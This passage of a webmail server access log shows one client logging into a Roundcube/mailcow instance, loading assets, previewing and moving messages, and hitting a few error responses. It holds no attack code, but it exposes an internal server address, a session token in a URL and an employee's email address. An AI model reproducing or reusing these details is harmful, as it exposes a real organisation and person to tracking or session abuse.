"https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/deps/bootstrap.min.css?s=1748763916" [Client 222.117.41.51] [Length 23872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/program/js/common.min.js?s=1748763912" [Client 222.117.41.51] [Length 4859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/program/js/jquery.min.js?s=1748763914" [Client 222.117.41.51] [Length 31747] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/deps/bootstrap.bundle.min.js?s=1748763916" [Client 222.117.41.51] [Length 21755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/styles/styles.min.css?s=1748763912" [Client 222.117.41.51] [Length 22373] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/program/js/app.min.js?s=1748763912" [Client 222.117.41.51] [Length 48072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/program/js/jstz.min.js?s=1748763914" [Client 222.117.41.51] [Length 5013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/plugins/jqueryui/js/i18n/datepicker-ko.js?s=1748763912" [Client 222.117.41.51] [Length 643] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/ui.min.js?s=1748763912" [Client 222.117.41.51] [Length 19679] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/plugins/jqueryui/js/jquery-ui.min.js?s=1748763912" [Client 222.117.41.51] [Length 70380] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/images/logo.svg?s=1748763912" [Client 222.117.41.51] [Length 395] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/fonts/fa-solid-900.woff2" [Client 222.117.41.51] [Length 75440] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/fonts/roboto-v29-regular.woff2" [Client 222.117.41.51] [Length 50240] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/images/favicon.ico?s=1748763912" [Client 222.117.41.51] [Length 1691] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:45 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2545] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:13:50 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=N2BSMLFosdfznMynFPnIw5ft7eNtc1DZ" [Client 222.117.41.51] [Length 11597] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771136031123" [Client 222.117.41.51] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771136031172&_=1771136031122" [Client 222.117.41.51] [Length 3616] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:53 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13739&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:53 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=bogang.park%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:56 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13738&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5630] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:56 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=support%40emailjs.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13739&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:13:59 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13701&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4815] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:01 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13700&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4833] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:20 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 680] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:22 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13279&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 10274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:22 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=noreply%40flyasiana.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:24 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13700&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4833] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:28 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:28 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13279&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 10261] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:30 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13738&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5630] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:34 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13279&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 10261] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:34 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 681] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:36 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13739&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:38 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 684] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13279&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 10261] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:56 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 12142] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/img/cow_mailcow.svg" [Client 222.117.41.51] [Length 5247] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css" [Client 222.117.41.51] [Length 52850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/css/themes/mailcow-darkmode.css" [Client 222.117.41.51] [Length 2118] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/css/flags/4x3/kr.svg" [Client 222.117.41.51] [Length 761] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 222.117.41.51] [Length 261956] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/bootstrap-icons.woff2?524846017b983fc8ded9325d94ed40f3" [Client 222.117.41.51] [Length 102536] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-regular.woff2" [Client 222.117.41.51] [Length 156884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-700.woff2" [Client 222.117.41.51] [Length 155152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-italic.woff2" [Client 222.117.41.51] [Length 119256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/noto-sans-v12-latin_greek_cyrillic-700italic.woff2" [Client 222.117.41.51] [Length 125244] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:14:57 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 222.117.41.51] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:15:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 12142] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:15:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:32:12 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 12142] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:32:12 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:32:22 +0000] - 301 301 - GET https mail.hanmocnn.co.kr "/rc" [Client 222.117.41.51] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:32:22 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2539] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:32:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2539] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:35:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 12142] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:35:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/api/v1/get/passwordpolicy/html" [Client 222.117.41.51] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:36:26 +0000] - 400 400 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:36:26 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/rc/" -[15/Feb/2026:06:36:32 +0000] - 400 400 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 12144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/img/cow_mailcow.svg" [Client 222.117.41.51] [Length 5247] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css" [Client 222.117.41.51] [Length 52850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/css/themes/mailcow-darkmode.css" [Client 222.117.41.51] [Length 2118] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/css/flags/4x3/kr.svg" [Client 222.117.41.51] [Length 761] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 222.117.41.51] [Length 261956] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/fonts/bootstrap-icons.woff2?524846017b983fc8ded9325d94ed40f3" [Client 222.117.41.51] [Length 102536] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:06:36:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr 